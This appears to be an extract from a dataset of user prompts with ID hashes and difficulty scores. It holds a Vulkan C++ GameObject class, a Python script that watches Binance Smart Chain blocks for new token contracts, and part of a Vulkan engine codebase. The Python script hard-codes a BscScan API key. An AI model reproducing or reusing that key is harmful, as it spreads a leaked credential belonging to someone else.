mvpBufferMemory = mvpBufferMemory2;
material->CreateDescriptorSet(mvpBuffer, sizeof(MVP));
renderer.CreateGraphicsPipeline(mesh, material);
}
// Per-frame update: spin the object about the Y axis at 90 deg/s and the
// Z axis at 50 deg/s, then rebuild the cached model matrix.
void GameObject::Update(float deltaTime)
{
const float yawRate  = glm::radians(90.0f);
const float rollRate = glm::radians(50.0f);
rotation.y += yawRate * deltaTime;
rotation.z += rollRate * deltaTime;
UpdateModelMatrix();
}
// Records draw commands for this object into the renderer's current command
// buffer: binds the mesh buffers, uploads the MVP matrices to the per-object
// uniform buffer, binds pipeline + descriptor set, then issues the indexed draw.
// (Improvement: removed the large blocks of dead, commented-out buffer code.)
void GameObject::Render(Renderer& renderer, const Camera& camera)
{
VkDevice device = *renderer.GetDevice();
// Bind mesh vertex and index buffers.
VkBuffer vertexBuffers[] = { mesh->GetVertexBuffer() };
VkDeviceSize offsets[] = { 0 };
vkCmdBindVertexBuffers(*renderer.GetCurrentCommandBuffer(), 0, 1, vertexBuffers, offsets);
vkCmdBindIndexBuffer(*renderer.GetCurrentCommandBuffer(), mesh->GetIndexBuffer(), 0, VK_INDEX_TYPE_UINT32);
// Layout must match the uniform block consumed by the vertex shader.
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
} mvp;
mvp.model = modelMatrix;
mvp.view = camera.GetViewMatrix();
mvp.projection = camera.GetProjectionMatrix();
// Upload the MVP data into the host-visible uniform buffer.
void* data = nullptr;
vkMapMemory(device, mvpBufferMemory, 0, sizeof(MVP), 0, &data);
memcpy(data, &mvp, sizeof(MVP));
vkUnmapMemory(device, mvpBufferMemory);
// HACK: full-device stall on every object, every frame — a severe bottleneck.
// Kept for now because the buffer is shared; replace with per-frame buffers
// plus proper synchronization (fences/semaphores).
vkDeviceWaitIdle(device);
// Bind the descriptor set associated with the material.
VkDescriptorSet descriptorSet = material->GetDescriptorSet();
material->UpdateBufferBinding(mvpBuffer, device, sizeof(MVP));
vkCmdBindPipeline(*renderer.GetCurrentCommandBuffer(), VK_PIPELINE_BIND_POINT_GRAPHICS, renderer.GetPipeline().get()->GetPipeline());
vkCmdBindDescriptorSets(*renderer.GetCurrentCommandBuffer(), VK_PIPELINE_BIND_POINT_GRAPHICS, material->GetPipelineLayout(), 0, 1, &descriptorSet, 0, nullptr);
// Issue the indexed draw for the whole mesh.
uint32_t numIndices = static_cast<uint32_t>(mesh->GetIndices().size());
vkCmdDrawIndexed(*renderer.GetCurrentCommandBuffer(), numIndices, 1, 0, 0, 0);
}
void GameObject::Shutdown()
{
// Clean up resources, if necessary
// (depending on how Mesh and Material resources are managed)
if (material) {
material->Cleanup();
delete material;
material = nullptr;
}
if (mesh) {
delete mesh;
mesh = nullptr;
}
this->initialized = false;
}
// Sets the world-space position and refreshes the cached model matrix.
void GameObject::SetPosition(const glm::vec3& position)
{
this->position = position;
UpdateModelMatrix();
}
// Sets the per-axis rotation (radians, applied X→Y→Z in UpdateModelMatrix)
// and refreshes the cached model matrix.
void GameObject::SetRotation(const glm::vec3& rotation)
{
this->rotation = rotation;
UpdateModelMatrix();
}
// Sets the per-axis scale factors and refreshes the cached model matrix.
void GameObject::SetScale(const glm::vec3& scale)
{
this->scale = scale;
UpdateModelMatrix();
}
// Rebuilds modelMatrix as T * Rx * Ry * Rz * S: translate first, then rotate
// about X, Y, Z in that order (angles in radians), then scale.
void GameObject::UpdateModelMatrix()
{
modelMatrix = glm::mat4(1.0f);
modelMatrix = glm::translate(modelMatrix, position);
modelMatrix = glm::rotate(modelMatrix, rotation.x, glm::vec3(1.0f, 0.0f, 0.0f));
modelMatrix = glm::rotate(modelMatrix, rotation.y, glm::vec3(0.0f, 1.0f, 0.0f));
modelMatrix = glm::rotate(modelMatrix, rotation.z, glm::vec3(0.0f, 0.0f, 1.0f));
modelMatrix = glm::scale(modelMatrix, scale);
}
// Borrowed pointer to the owned mesh; valid after Initialize(), null before.
Mesh* GameObject::GetMesh()
{
return mesh;
}
// Borrowed pointer to the owned material; valid after Initialize(), null before.
Material* GameObject::GetMaterial()
{
return material;
}
Can you improve the code for the GameObject class?
|
457fa6ce1aa8693e7c322fa6dbbc7e91
|
{
"intermediate": 0.4166281521320343,
"beginner": 0.35532474517822266,
"expert": 0.22804704308509827
}
|
11,290
|
# Оптимизированный!!! Возвращает адреса созданных токенов из новых блоков в реальном времени
# Выводит только контракты, у которых есть имя
# Использован Web3
import asyncio
import aiohttp
import time
from web3 import Web3
# NOTE(review): hard-coded API key committed to source — move to an env var.
bscscan_api_key = 'CXTB4IUT31N836G93ZI3YQBEWBQEGGH5QS'
# Limit concurrent BscScan API requests (currently 1 at a time;
# the old comment claiming a limit of 3 was stale).
semaphore = asyncio.Semaphore(1)
# Minimal ERC-20 ABI: just the name() view function.
abi = [{"constant": True, "inputs": [], "name": "name", "outputs": [{"name": "", "type": "string"}], "payable": False, "stateMutability": "view", "type": "function"}]
# Synchronous Web3 client against a public BSC RPC endpoint.
w3 = Web3(Web3.HTTPProvider("https://bsc-dataseed.binance.org/"))
async def get_contract_details(contract_address):
    """Fetch the on-chain token name for *contract_address*.

    Returns {"name": <str>} on success, or None if the lookup fails
    (bad address, contract without name(), RPC error).
    """
    try:
        checksum_address = Web3.to_checksum_address(contract_address)
        contract = w3.eth.contract(address=checksum_address, abi=abi)
        # BUG FIX: .call() performs blocking HTTP I/O (web3's HTTPProvider is
        # synchronous) inside an async def, stalling the whole event loop.
        # Run it in a worker thread instead.
        name = await asyncio.to_thread(contract.functions.name().call)
    except Exception as e:
        print(f"Error getting contract details: {e}")
        return None
    return {"name": name}
async def get_latest_block_number():
    """Return the newest BSC block number as an int (via BscScan's proxy API)."""
    url = f'https://api.bscscan.com/api?module=proxy&action=eth_blockNumber&apikey={bscscan_api_key}'
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as response:
            payload = await response.json()
    # The proxy endpoint returns the block number as a hex string.
    return int(payload['result'], 16)
async def get_external_transactions(block_number):
    """Fetch block *block_number* (hex tag string) from BscScan.

    Returns the block's transaction list, or [] on any request error or
    when the block cannot be resolved.
    """
    async with semaphore:
        async with aiohttp.ClientSession() as session:
            url = (
                f'https://api.bscscan.com/api?module=proxy&action=eth_getBlockByNumber'
                f'&tag={block_number}&boolean=true&apikey={bscscan_api_key}'
            )
            try:
                async with session.get(url) as response:
                    payload = await response.json()
            except Exception as e:
                print(f'Error in API request: {e}')
                return []
    result = payload['result']
    # A missing result, or a string result, means BscScan could not resolve the block.
    if result is None or isinstance(result, str):
        print(f"Error: Cannot find the block")
        return []
    return result.get('transactions', [])
async def get_contract_address(tx_hash):
    """Return the contractAddress from the receipt of *tx_hash*, or None.

    None is returned on request errors or when the receipt is missing —
    callers must handle it.
    """
    async with semaphore:
        async with aiohttp.ClientSession() as session:
            url = (
                f'https://api.bscscan.com/api?module=proxy&action=eth_getTransactionReceipt'
                f'&txhash={tx_hash}&apikey={bscscan_api_key}'
            )
            try:
                async with session.get(url) as response:
                    payload = await response.json()
            except Exception as e:
                print(f'Error in API request: {e}')
                return None
    receipt = payload['result']
    if receipt is None or not isinstance(receipt, dict):
        print(f"Error: Cannot find the address")
        return None
    return receipt.get('contractAddress')
def check_method_id(input_data):
    """True if the first 10 chars of the tx input end in '6040'.

    '0x60806040' is the standard Solidity constructor preamble, so this is a
    cheap heuristic for contract-creation bytecode.
    """
    selector = input_data[:10]
    return selector.endswith('6040')
async def process_block(block_number_int):
    """Scan one block for contract-creation transactions and print any newly
    created contracts whose name() can be read.

    Prints a trailing blank line between blocks either way.
    """
    block_number = hex(block_number_int)
    transactions = await get_external_transactions(block_number)
    if not transactions:
        print(f'No transactions found in block {block_number_int}')
    else:
        print(f'Transactions in block {block_number_int}:')
        for tx in transactions:
            # Contract creation: constructor-style input selector and no recipient.
            if check_method_id(tx['input']):
                if tx['to'] is None:
                    contract_address = await get_contract_address(tx['hash'])
                    # BUG FIX: the receipt lookup can return None; previously None
                    # was passed straight into get_contract_details.
                    if contract_address is None:
                        continue
                    contract_details = await get_contract_details(contract_address)
                    if contract_details:
                        print(f"New contract creation with TokenTracker details: Contract Address: {contract_address}, Name: {contract_details['name']}")
    print("\n") # Print an empty line between blocks
async def display_transactions(block_start, block_end):
    """Process blocks block_start..block_end (inclusive) concurrently."""
    jobs = (process_block(number) for number in range(block_start, block_end + 1))
    await asyncio.gather(*jobs)
async def main():
    """Poll BSC forever, scanning each newly produced block range for
    contract-creation transactions."""
    block_start = await get_latest_block_number()  # start at the chain tip
    block_end = block_start + 10  # process 10 blocks initially
    while True:
        await display_transactions(block_start, block_end)
        # Advance the window to whatever has been produced since the last pass.
        block_start = block_end + 1
        block_end = await get_latest_block_number()
        # BUG FIX: time.sleep(5) blocked the event loop (freezing all pending
        # coroutines); asyncio.sleep yields control while waiting.
        await asyncio.sleep(5)

if __name__ == '__main__':
    asyncio.run(main())
Extend the code so that, in addition to the contract address and name, it also displays the address of the contract creator.
|
0c4d4ebf8bc75344c99439b66d95c8e8
|
{
"intermediate": 0.4319572150707245,
"beginner": 0.4892805814743042,
"expert": 0.0787622258067131
}
|
11,291
|
I’m building a video game engine using C++ as the coding language and Vulkan for graphics. I am trying to set up a generic renderer using Vulkan that is flexible and will render objects based on a vector that is supplied to it. The renderer will also handle the creation of the window using GLFW and use GLM for all relevant math calls. I am using the ASSIMP library to load 3d models and animations.
Here is a portion of the code:
BufferUtils.h:
#pragma once
#include <vulkan/vulkan.h>
#include <stdint.h>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory);
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties);
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size);
}
Camera.h:
#pragma once
#include <glm/glm.hpp>
class Camera
{
public:
Camera();
~Camera();
void Initialize(float aspectRatio);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
const glm::mat4& GetViewMatrix() const;
const glm::mat4& GetProjectionMatrix() const;
private:
glm::vec3 position;
glm::vec3 rotation;
glm::mat4 viewMatrix;
glm::mat4 projectionMatrix;
void UpdateViewMatrix();
};
Engine.h:
#pragma once
#include "Window.h"
#include "Renderer.h"
#include "Scene.h"
#include <chrono>
#include <thread>
class Engine
{
public:
Engine();
~Engine();
void Run();
void Shutdown();
int MaxFPS = 60;
private:
void Initialize();
void MainLoop();
void Update(float deltaTime);
void Render();
Window window;
Renderer renderer;
Scene scene;
};
GameObject.h:
#pragma once
#include <glm/glm.hpp>
#include "Mesh.h"
#include "Material.h"
#include "Camera.h"
#include "Renderer.h"
class GameObject
{
public:
GameObject();
~GameObject();
void Initialize();
void Initialize2(Renderer& renderer);
void Update(float deltaTime);
void Render(Renderer& renderer, const Camera& camera);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
void SetScale(const glm::vec3& scale);
Mesh* GetMesh();
Material* GetMaterial();
private:
glm::mat4 modelMatrix;
glm::vec3 position;
glm::vec3 rotation;
glm::vec3 scale;
VkDeviceMemory mvpBufferMemory;
VkBuffer mvpBuffer;
Mesh* mesh;
Material* material;
bool initialized = false;
void UpdateModelMatrix();
};
Material.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Texture.h"
#include "Shader.h"
#include <stdexcept>
#include <memory> // Don’t forget to include <memory>
#include <array>
// Add this struct outside the Material class, possibly at the top of Material.cpp
struct ShaderDeleter {
void operator()(Shader* shaderPtr) {
if (shaderPtr != nullptr) {
Shader::Cleanup(shaderPtr);
}
}
};
class Material
{
public:
Material();
~Material();
void Initialize(const std::string& vertShaderPath, const std::string& fragShaderPath, const std::string& texturePath, VkDevice device, VkDescriptorSetLayout descriptorSetLayout, VkDescriptorPool descriptorPool, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
void LoadTexture(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void LoadShaders(const std::string& vertFilename, const std::string& fragFilename, VkDevice device);
void UpdateBufferBinding(VkBuffer newBuffer, VkDevice device, VkDeviceSize devicesize);
VkDescriptorSet GetDescriptorSet() const;
VkPipelineLayout GetPipelineLayout() const;
std::shared_ptr <Shader> GetvertexShader();
std::shared_ptr <Shader> GetfragmentShader();
void CreateDescriptorSet(VkBuffer uniformBuffer, VkDeviceSize bufferSize);
private:
VkDevice device;
std::shared_ptr <Shader> vertexShader;
std::shared_ptr <Shader> fragmentShader;
std::shared_ptr<Texture> texture;
void CreatePipelineLayout(VkDescriptorSetLayout descriptorSetLayout);
VkDescriptorSet descriptorSet;
VkPipelineLayout pipelineLayout;
VkDescriptorSetLayout descriptorSetLayout;// = VK_NULL_HANDLE;
VkDescriptorPool descriptorPool;
void CleanupDescriptorSetLayout();
};
Mesh.h:
#pragma once
#include <vector>
#include <vulkan/vulkan.h>
#include <glm/glm.hpp>
#include "BufferUtils.h"
struct Vertex {
glm::vec3 position;
glm::vec3 color;
glm::vec2 texCoord;
};
class Mesh
{
public:
Mesh();
~Mesh();
void Initialize(std::vector<Vertex> vertices, std::vector<uint32_t> indices, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Initialize(VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Vertex>& GetVertices() const;
const std::vector<uint32_t>& GetIndices() const;
VkBuffer GetVertexBuffer() const;
VkBuffer GetIndexBuffer() const;
void SetVertices(const std::vector<Vertex>& vertices);
void SetIndices(const std::vector<uint32_t>& indices);
std::vector<VkVertexInputBindingDescription> GetVertexInputBindingDescriptions() const;
std::vector<VkVertexInputAttributeDescription> GetVertexInputAttributeDescriptions() const;
private:
VkDevice device;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
VkBuffer vertexBuffer;
VkDeviceMemory vertexBufferMemory;
VkBuffer indexBuffer;
VkDeviceMemory indexBufferMemory;
};
Model.h:
#pragma once
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
#include <assimp/postprocess.h>
#include "Mesh.h"
#include <string>
#include <vector>
#include <vulkan/vulkan.h>
#include <stdexcept>
class Model
{
public:
Model();
~Model();
void LoadModel(const std::string& filepath, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Mesh>& GetMeshes() const;
private:
std::vector<Mesh> meshes;
void LoadNode(aiNode* node, const aiScene* scene, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
Mesh LoadMesh(aiMesh* mesh, const aiScene* scene);
};
Pipeline.h:
#pragma once
#include <vulkan/vulkan.h>
#include <vector>
#include <array>
#include <stdexcept>
#include "Shader.h"
class Pipeline
{
public:
Pipeline();
~Pipeline();
void CreateGraphicsPipeline(const std::vector<VkVertexInputBindingDescription>& vertexBindingDescriptions,
const std::vector<VkVertexInputAttributeDescription>& vertexAttributeDescriptions,
VkExtent2D swapchainExtent,
const std::vector<Shader*>& shaders,
VkRenderPass renderPass,
VkPipelineLayout pipelineLayout,
VkDevice device);
void Cleanup();
VkPipeline GetPipeline() const;
bool IsInitialized() const;
private:
VkDevice device;
VkPipeline pipeline;
bool initialized;
void CreateShaderStages(const std::vector<Shader*>& shaders, std::vector<VkPipelineShaderStageCreateInfo>& shaderStages);
};
Renderer.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Window.h"
#include <vector>
#include <stdexcept>
#include <set>
#include <optional>
#include <iostream>
#include "Pipeline.h"
#include "Material.h"
#include "Mesh.h"
struct QueueFamilyIndices
{
std::optional<uint32_t> graphicsFamily;
std::optional<uint32_t> presentFamily;
bool IsComplete()
{
return graphicsFamily.has_value() && presentFamily.has_value();
}
};
struct SwapChainSupportDetails {
VkSurfaceCapabilitiesKHR capabilities;
std::vector<VkSurfaceFormatKHR> formats;
std::vector<VkPresentModeKHR> presentModes;
};
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
};
class Renderer
{
public:
Renderer();
~Renderer();
void Initialize(GLFWwindow* window);
void Shutdown();
void BeginFrame();
void EndFrame();
VkDescriptorSetLayout CreateDescriptorSetLayout();
VkDescriptorPool CreateDescriptorPool(uint32_t maxSets);
VkDevice* GetDevice();
VkPhysicalDevice* GetPhysicalDevice();
VkCommandPool* GetCommandPool();
VkQueue* GetGraphicsQueue();
VkCommandBuffer* GetCurrentCommandBuffer();
std::shared_ptr<Pipeline> GetPipeline();
void CreateGraphicsPipeline(Mesh* mesh, Material* material);
std::pair<VkBuffer, VkDeviceMemory> RequestMvpBuffer();
private:
bool isShutDown = false;
static const uint32_t kMvpBufferCount = 3;
std::vector<VkBuffer> mvpBuffers;
std::vector<VkDeviceMemory> mvpBufferMemory;
uint32_t currentMvpBufferIndex = 0;
bool shutdownInProgress;
uint32_t currentCmdBufferIndex = 0;
std::vector<size_t> currentFramePerImage;
std::vector<VkImage> swapChainImages;
std::vector<VkImageView> swapChainImageViews;
VkExtent2D swapChainExtent;
VkRenderPass renderPass;
uint32_t imageIndex;
std::shared_ptr<Pipeline> pipeline;
VkFormat swapChainImageFormat;
std::vector<VkCommandBuffer> commandBuffers;
void CreateImageViews();
void CleanupImageViews();
void CreateRenderPass();
void CleanupRenderPass();
void CreateSurface();
void DestroySurface();
void CreateInstance();
void CleanupInstance();
void ChoosePhysicalDevice();
void CreateDevice();
void CleanupDevice();
void CreateSwapchain();
void CleanupSwapchain();
void CreateCommandPool();
void CleanupCommandPool();
void CreateFramebuffers();
void CleanupFramebuffers();
void CreateCommandBuffers();
void CleanupCommandBuffers();
void Present();
GLFWwindow* window;
VkInstance instance = VK_NULL_HANDLE;
VkPhysicalDevice physicalDevice = VK_NULL_HANDLE;
VkDevice device = VK_NULL_HANDLE;
VkSurfaceKHR surface;
VkSwapchainKHR swapchain;
VkCommandPool commandPool;
VkCommandBuffer currentCommandBuffer;
std::vector<VkFramebuffer> framebuffers;
// Additional Vulkan objects needed for rendering…
const uint32_t kMaxFramesInFlight = 2;
std::vector<VkSemaphore> imageAvailableSemaphores;
std::vector<VkSemaphore> renderFinishedSemaphores;
std::vector<VkFence> inFlightFences;
size_t currentFrame;
VkQueue graphicsQueue;
VkQueue presentQueue;
void CreateSyncObjects();
void CleanupSyncObjects();
SwapChainSupportDetails querySwapChainSupport(VkPhysicalDevice device, VkSurfaceKHR surface);
VkSurfaceFormatKHR chooseSwapSurfaceFormat(const std::vector<VkSurfaceFormatKHR>& availableFormats);
VkPresentModeKHR chooseSwapPresentMode(const std::vector<VkPresentModeKHR>& availablePresentModes);
VkExtent2D chooseSwapExtent(const VkSurfaceCapabilitiesKHR& capabilities, GLFWwindow* window);
std::vector<const char*> deviceExtensions = {
VK_KHR_SWAPCHAIN_EXTENSION_NAME
};
std::vector<const char*> CheckPhysicalDeviceExtensionSupport(VkPhysicalDevice physicalDevice);
QueueFamilyIndices GetQueueFamilyIndices(VkPhysicalDevice physicalDevice);
};
Scene.h:
#pragma once
#include <vector>
#include "GameObject.h"
#include "Camera.h"
#include "Renderer.h"
class Scene
{
public:
Scene();
~Scene();
void Initialize();
void Update(float deltaTime);
void Render(Renderer& renderer);
void Shutdown();
void AddGameObject(GameObject* gameObject);
Camera& GetCamera();
float temp;
private:
std::vector<GameObject*> gameObjects;
Camera camera;
};
Shader.h:
#pragma once
#include <vulkan/vulkan.h>
#include <string>
class Shader
{
public:
Shader();
~Shader();
void LoadFromFile(const std::string& filename, VkDevice device, VkShaderStageFlagBits stage);
VkPipelineShaderStageCreateInfo GetPipelineShaderStageCreateInfo() const;
static void Cleanup(Shader* shader);
private:
VkDevice device;
VkShaderModule shaderModule;
VkShaderStageFlagBits stage;
};
Simplex.h:
#pragma once
#ifndef SIMPLEX_H
#define SIMPLEX_H
#include <iostream>
class SimplexNoise {
private:
int testvar;
int grad3[12][3]{ { 1, 1, 0 }, { -1, 1, 0 }, { 1, -1, 0 },
{ -1, -1, 0 }, { 1, 0, 1 }, { -1, 0, 1 }, { 1, 0, -1 },
{ -1, 0, -1 }, { 0, 1, 1 }, { 0, -1, 1 }, { 0, 1, -1 },
{ 0, -1, -1 } };
int grad4[32][4] = { { 0, 1, 1, 1 }, { 0, 1, 1, -1 },
{ 0, 1, -1, 1 }, { 0, 1, -1, -1 }, { 0, -1, 1, 1 },
{ 0, -1, 1, -1 }, { 0, -1, -1, 1 }, { 0, -1, -1, -1 },
{ 1, 0, 1, 1 }, { 1, 0, 1, -1 }, { 1, 0, -1, 1 }, { 1, 0, -1, -1 },
{ -1, 0, 1, 1 }, { -1, 0, 1, -1 }, { -1, 0, -1, 1 },
{ -1, 0, -1, -1 }, { 1, 1, 0, 1 }, { 1, 1, 0, -1 },
{ 1, -1, 0, 1 }, { 1, -1, 0, -1 }, { -1, 1, 0, 1 },
{ -1, 1, 0, -1 }, { -1, -1, 0, 1 }, { -1, -1, 0, -1 },
{ 1, 1, 1, 0 }, { 1, 1, -1, 0 }, { 1, -1, 1, 0 }, { 1, -1, -1, 0 },
{ -1, 1, 1, 0 }, { -1, 1, -1, 0 }, { -1, -1, 1, 0 },
{ -1, -1, -1, 0 } };
int p_supply[256] = { 151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96,
53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94,
252, 219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87,
174, 20, 125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48,
27, 166, 77, 146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230,
220, 105, 92, 41, 55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63,
161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89, 18, 169, 200, 196,
135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173, 186, 3, 64,
52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255, 82,
85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101,
155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113,
224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193,
238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14,
239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204, 176,
115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180 };
// To remove the need for index wrapping, double the permutation table
// length
int perm[512] = {};
/*static {
for (int i = 0; i < 512; i++)
perm[i] = p[i & 255];
}*/
// A lookup table to traverse the simplex around a given point in 4D.
// Details can be found where this table is used, in the 4D noise method.
int simplex[64][4] = { { 0, 1, 2, 3 }, { 0, 1, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 2, 3, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 2, 3, 0 }, { 0, 2, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 3, 1, 2 }, { 0, 3, 2, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 3, 2, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 1, 2, 0, 3 }, { 0, 0, 0, 0 },
{ 1, 3, 0, 2 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 2, 3, 0, 1 }, { 2, 3, 1, 0 }, { 1, 0, 2, 3 }, { 1, 0, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 3, 1 },
{ 0, 0, 0, 0 }, { 2, 1, 3, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 0, 1, 2 }, { 3, 0, 2, 1 },
{ 0, 0, 0, 0 }, { 3, 1, 2, 0 }, { 2, 1, 0, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 1, 0, 2 }, { 0, 0, 0, 0 },
{ 3, 2, 0, 1 }, { 3, 2, 1, 0 } };
int p[256] = {};
int RANDOMSEED = 0;
int NUMBEROFSWAPS = 400;
public:
SimplexNoise(int inseed);
double noise(double xin, double yin);
double noise(double xin, double yin, double zin);
double noise(double xin, double yin, double zin, double win);
};
#endif
Terrain.h:
#pragma once
#include "Simplex.h"
#include "Mesh.h"
#include "Material.h"
#include "GameObject.h"
class Terrain {
public:
Terrain(int seed, int worldSize, float scale, VkDevice* device, VkPhysicalDevice* physicalDevice, VkCommandPool* commandPool, VkQueue* graphicsQueue);
~Terrain();
void GenerateTerrain(VkDescriptorSetLayout descriptorSetLayout, VkDescriptorSetLayout samplerDescriptorSetLayout, VkDescriptorPool descriptorPool);
GameObject* GetTerrainObject();
private:
void GenerateHeightMap();
void ConvertHeightMapToMeshData();
int seed;
int worldSize;
float scale;
VkDevice* device;
VkPhysicalDevice* physicalDevice;
VkCommandPool* commandPool;
VkQueue* graphicsQueue;
SimplexNoise noise;
std::vector<std::vector<float>> heightMap;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
Mesh* terrainMesh;
Material* terrainMaterial;
GameObject* terrainObject;
};
Texture.h:
#pragma once
#include <vulkan/vulkan.h>
#include "stb_image.h" // Include the stb_image header
#include "BufferUtils.h"
#include <string>
class Texture
{
public:
Texture();
~Texture();
void LoadFromFile(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
VkImageView GetImageView() const;
VkSampler GetSampler() const;
void Cleanup();
private:
VkDevice device;
VkImage image;
VkDeviceMemory imageMemory;
VkImageView imageView;
VkSampler sampler;
VkPhysicalDevice physicalDevice;
VkCommandPool commandPool;
VkQueue graphicsQueue;
bool initialized = false;
void CreateImage(uint32_t width, uint32_t height, uint32_t mipLevels, VkSampleCountFlagBits numSamples,
VkFormat format, VkImageTiling tiling, VkImageUsageFlags usage, VkMemoryPropertyFlags properties);
void TransitionImageLayout(VkImageLayout oldLayout, VkImageLayout newLayout,
uint32_t mipLevels, VkSampleCountFlagBits numSamples);
void CopyBufferToImage(VkBuffer buffer, uint32_t width, uint32_t height);
void CreateImageView(VkFormat format, VkImageAspectFlags aspectFlags, uint32_t mipLevels);
void CreateSampler(uint32_t mipLevels);
void GenerateMipmaps(uint32_t width, uint32_t height, uint32_t mipLevels);
VkCommandBuffer BeginSingleTimeCommands(VkCommandPool commandPool, VkDevice device);
void EndSingleTimeCommands(VkCommandPool commandPool, VkQueue graphicsQueue, VkDevice device, VkCommandBuffer commandBuffer);
};
Window.h:
#pragma once
#define GLFW_INCLUDE_VULKAN
#include <GLFW/glfw3.h>
class Window
{
public:
Window(int width = 800, int height = 600, const char* title = "Game Engine");
~Window();
void Initialize();
void PollEvents();
void Shutdown();
bool ShouldClose() const;
GLFWwindow* GetWindow() const;
float GetDeltaTime();
private:
static void FramebufferResizeCallback(GLFWwindow* window, int width, int height);
static void keyCallback(GLFWwindow* window, int key, int scancode, int action, int mods);
int width;
int height;
const char* title;
GLFWwindow* window;
double lastFrameTime;
};
Engine.cpp:
#include "Engine.h"
#include "Terrain.h"
#include <iostream>
// Constructing the engine performs full startup (window, renderer, scene).
// NOTE(review): heavy Vulkan setup in a constructor leaves no way to report
// failure except exceptions — confirm that is acceptable here.
Engine::Engine()
{
Initialize();
}
// Tears everything down when the engine goes out of scope.
Engine::~Engine()
{
Shutdown();
}
// Blocks in the main loop until the window is closed.
void Engine::Run()
{
MainLoop();
}
// Starts the window/renderer/scene and builds a single demo cube GameObject.
// NOTE(review): squareTile is heap-allocated and handed to the scene —
// presumably Scene::Shutdown deletes it; confirm to rule out a leak.
void Engine::Initialize()
{
// Initialize window, renderer, and scene
window.Initialize();
renderer.Initialize(window.GetWindow());
scene.Initialize();
VkDescriptorSetLayout descriptorSetLayout = renderer.CreateDescriptorSetLayout();
//VkDescriptorPool descriptorPool = renderer.CreateDescriptorPool(1); // Assuming only one terrain object
//VkDescriptorSetLayout samplerDescriptorSetLayout = renderer.CreateSamplerDescriptorSetLayout(); // Use this new method to create a separate descriptor layout.
VkDescriptorPool descriptorPool = renderer.CreateDescriptorPool(1);
// Create a simple square tile GameObject
GameObject* squareTile = new GameObject();
squareTile->Initialize();
// Define the cube’s vertices and indices
std::vector<Vertex> vertices = {
{ {-0.5f, -0.5f, -0.5f}, {1.0f, 0.0f, 0.0f}, {0.0f, 0.0f} }, // bottom-left-back
